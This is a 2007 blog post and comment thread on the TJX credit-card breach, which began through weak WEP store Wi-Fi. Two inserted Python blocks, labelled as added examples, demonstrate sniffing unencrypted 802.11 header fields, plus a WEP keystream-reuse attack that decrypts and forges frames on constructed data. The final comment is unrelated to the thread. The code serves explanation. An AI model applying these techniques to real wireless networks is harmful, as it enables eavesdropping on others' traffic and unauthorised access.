TJX breach may have started with wireless access
May 8th, 2007 by chitchcock Posted in Credit Card Fraud, Merchant, Third-Parties, Wireless
The WSJ reports:
“The biggest known theft of credit-card numbers in history began two summers ago outside a Marshalls discount clothing store near St. Paul, Minn.
There, investigators now believe, hackers pointed a telescope-shaped antenna toward the store and used a laptop computer to decode data streaming through the air between hand-held price-checking devices, cash registers and the store’s computers. That helped them hack into the central database of Marshalls’ parent, TJX Cos. in Framingham, Mass., to repeatedly purloin information about customers.
The $17.4-billion retailer’s wireless network had less security than many people have on their home networks, and for 18 months the …”
More information here and here.
6 Responses to “TJX breach may have started with wireless access”
By Rob Newby on May 8, 2007
I’ve mentioned this on my own blog, but apparently they were using WEP encryption, without MAC filters and broadcasting their SSID.
Mike Rothman commented that as the attack had been going on for 4 years, this level of security wasn’t really surprising. What this really illustrates is how hard it is to a) communicate inside vast organisations, and therefore b) get a security program moving quickly.
PCI deadlines are pretty close now, and apparently only 3% of retailers are compliant. Awareness of PCI is at an all time high however.
We can all learn from this the length of time it takes to communicate such an idea and for it to reach the right people.
By arkan on May 8, 2007
What is more outrageous than the fact that a few TJX stores ran WEP (they were supposedly in the process of upgrading to WPA) is the fact that once on the store network, the attackers were free to roam the internal corporate network unnoticed for years. In short order, they made their way to the main (load-balanced) payment switch, allowing them to capture transaction data, again, for years.
System accounts were added and large files were transferred out via FTP, all under the not-so-watchful eyes of TJX IT.
By chitchcock on May 11, 2007
—–[snip]—–
without MAC filters and broadcasting their SSID
—–[/snip]—–
While I agree with you on the WEP issue, I don’t really fault them for a lack of MAC filtering or for broadcasting their SSID. Both are known to be horrible security measures as both are sent in the clear, regardless of encryption. Since they were already *doing* wireless sniffing, they just had to sit there and wait for a client to connect.
MAC filtering and SSID stealthing are really more trouble than they’re worth. Maintaining MAC lists in particular is a huge pain and detrimentally affects usability far more than it provides in security.
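The point chitchcock makes above, that MAC addresses and SSIDs are visible regardless of encryption, can be checked against the 802.11 frame format itself. The Python below is an added example written for this page, not code from the post or its commenters; the addresses, the network name STORE-WLAN and the frames are constructed. It builds a probe request, a beacon with and without a blanked SSID, and a WEP-protected data frame, then parses them the way a passive sniffer would. The 24-byte header, including addr2 (the transmitting MAC), is never encrypted, so a MAC whitelist is just a list of addresses to clone, and a "hidden" SSID is still named in the clear by every client that probes for it.

```python
"""802.11 header fields travel unencrypted. Added illustration with constructed
frames; client, AP and network name are hypothetical."""

CLIENT = "00:11:22:33:44:55"      # hypothetical handheld / register address
AP = "aa:bb:cc:dd:ee:ff"          # hypothetical access point (BSSID)
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_probe_request(client: str, ssid: str) -> bytes:
    """Management frame, subtype 4: the client names the network it wants."""
    fc = b"\x40\x00"  # type=management, subtype=probe request, no flags
    hdr = (fc + b"\x00\x00" + mac_bytes(BROADCAST) + mac_bytes(client)
           + mac_bytes(BROADCAST) + b"\x00\x00")
    ssid_bytes = ssid.encode()
    return hdr + bytes([0, len(ssid_bytes)]) + ssid_bytes  # element id 0 = SSID


def build_beacon(bssid: str, ssid: str, hidden: bool) -> bytes:
    """Management frame, subtype 8. 'SSID stealthing' only blanks this element."""
    fc = b"\x80\x00"
    hdr = (fc + b"\x00\x00" + mac_bytes(BROADCAST) + mac_bytes(bssid)
           + mac_bytes(bssid) + b"\x00\x00")
    fixed = bytes(8) + b"\x64\x00" + b"\x11\x00"  # timestamp, interval, capability (ESS+Privacy)
    ssid_bytes = b"" if hidden else ssid.encode()
    return hdr + fixed + bytes([0, len(ssid_bytes)]) + ssid_bytes


def build_wep_data_frame(client: str, bssid: str, iv: bytes, key_id: int,
                         ciphertext: bytes) -> bytes:
    """Data frame with the Protected flag set; only the body after the IV is encrypted."""
    fc = b"\x08\x41"  # type=data; flags: To-DS | Protected
    hdr = (fc + b"\x00\x00" + mac_bytes(bssid) + mac_bytes(client)
           + mac_bytes(BROADCAST) + b"\x00\x00")
    return hdr + iv + bytes([key_id << 6]) + ciphertext


def parse_frame(frame: bytes) -> dict:
    """Read what any passive sniffer reads: header fields and unencrypted elements."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    info = {
        "type": {0: "mgmt", 1: "ctrl", 2: "data"}.get(ftype, "?"),
        "subtype": subtype,
        "protected": bool(fc1 & 0x40),
        "addr1": mac_str(frame[4:10]),
        "transmitter": mac_str(frame[10:16]),  # addr2: the sending station, always in clear
        "addr3": mac_str(frame[16:22]),
        "ssid": None,
    }
    body = frame[24:]
    if ftype == 0:
        if subtype == 8:
            body = body[12:]  # skip the beacon's fixed fields
        i = 0
        while i + 2 <= len(body):  # walk the tagged parameters
            eid, elen = body[i], body[i + 1]
            if eid == 0:
                info["ssid"] = body[i + 2:i + 2 + elen].decode(errors="replace")
            i += 2 + elen
    elif ftype == 2 and info["protected"]:
        info["iv"], info["key_id"] = body[:3].hex(), body[3] >> 6
    return info


def stations_seen(frames) -> set:
    """Transmitter addresses observed: exactly the list a MAC filter would admit."""
    return {parse_frame(f)["transmitter"] for f in frames}


if __name__ == "__main__":
    frames = [
        build_beacon(AP, "STORE-WLAN", hidden=True),
        build_probe_request(CLIENT, "STORE-WLAN"),
        build_wep_data_frame(CLIENT, AP, bytes.fromhex("a1b2c3"), 0, b"\x00" * 20),
    ]
    for f in frames:
        print(parse_frame(f))
    print("addresses to clone:", stations_seen(frames))
```

Running it shows the hidden beacon carrying an empty name, the probe request carrying STORE-WLAN, and the WEP frame revealing its transmitter, BSSID and IV despite the Protected flag; the only thing the sniffer does not get from the data frame is the encrypted body.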
By Rob Newby on May 12, 2007
OK, fair point. MAC filtering is probably redundant at this scale of operations, but I would have thought hiding SSIDs was a minimum effort thing to do. My understanding of events was that the SSID had been picked up by wardriving in the first place, and then they’d set to work cracking the WEP key. Either way, using a wireless network connected to anything which has access to your customer records is pretty dumb.
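The WEP key recovery Rob refers to (the FMS, KoreK and PTW statistical attacks) needs a large capture of frames, but WEP's construction gives an attacker useful results from as few as two. The Python below is an added example written for this page, not code from the post or its commenters; the key, IV, addresses and payloads are constructed. It implements WEP's per-frame RC4 keying (24-bit IV prepended to the shared key) and its CRC-32 integrity check value, then shows what one repeated IV costs: with a single predictable frame (an ARP request, whose layout is fixed) the attacker recovers that IV's keystream, decrypts another frame sent under it, and forges a frame the access point will accept as valid, all without ever learning the key.

```python
"""WEP keystream reuse. Added illustration; key, IV and payloads are constructed."""
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA), exactly as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended before encryption."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV(3) | key-id byte | RC4(IV || key) applied to plaintext || ICV."""
    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4_keystream(iv + shared_key, len(data)))


def wep_decrypt(shared_key: bytes, body: bytes):
    """What the access point does: strip IV, decrypt, check the ICV."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4_keystream(iv + shared_key, len(ct)))
    pt, tag = data[:-4], data[-4:]
    return pt, tag == icv(pt)


# --- Constructed sample traffic (hypothetical key, IV, addresses, payloads) ---
KEY = bytes.fromhex("0102030405")            # 40-bit shared key
IV = bytes.fromhex("a1b2c3")                 # one 24-bit IV, reused by two frames
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
# A who-has ARP request: fixed layout, so an attacker can predict it byte for byte.
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex(
    "0001080006040001" "001122334455" "c0a80001" "000000000000" "c0a80002")
SECRET = b"register -> HQ: customer record 42"  # stands in for transaction data

FRAME_A = wep_encrypt(KEY, IV, ARP_REQUEST)  # plaintext known to the attacker
FRAME_B = wep_encrypt(KEY, IV, SECRET)       # same IV, therefore same keystream


def plaintext_xor(body_a: bytes, body_b: bytes) -> bytes:
    """With nothing known, two frames under one IV still leak P_a XOR P_b."""
    return xor(body_a[4:], body_b[4:])


def recover_keystream(body: bytes, known_plaintext: bytes) -> bytes:
    """keystream = ciphertext XOR (known plaintext || its ICV)."""
    return xor(body[4:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reused the IV; the key is never needed."""
    return xor(body[4:], keystream)


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Produce a frame with a valid ICV under this IV, without the key."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("known keystream too short for this payload")
    return iv + b"\x00" + xor(data, keystream)


def demo():
    ks = recover_keystream(FRAME_A, ARP_REQUEST)   # 40 bytes of keystream for IV
    leaked = decrypt_with_keystream(FRAME_B, ks)[:len(SECRET)]
    forged = forge_frame(IV, ks, b"ping 10.0.0.1")
    accepted, icv_ok = wep_decrypt(KEY, forged)     # the AP's view of the forgery
    return leaked, accepted, icv_ok


if __name__ == "__main__":
    leaked, accepted, icv_ok = demo()
    print("leaked:", leaked)
    print("forged frame accepted by AP:", accepted, icv_ok)
```

The recovered keystream is only as long as the known plaintext, which is why real tools (chopchop, the fragmentation attack, aireplay-style injection) work to extend it; but the IV space is only 2^24 = 16,777,216 values, so on a busy network reuse is a matter of hours, and nothing in WEP prevents an attacker from replaying a captured frame to force more traffic under an IV they already hold.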
By chitchcock on May 12, 2007
—–[snip]—–
Either way, using a wireless network connected to anything which has access to your customer records is pretty dumb.
—–[/snip]—–
Agreed…it’s funny that you should mention that. Even the otherwise minimalist Wiki page for PCI DSS mentions some WiFi security measures. I guess they missed that. :/
By Declan Mansfield on Aug 19, 2007
I forgot to mention: I am from Ireland, where Freestar has its main office.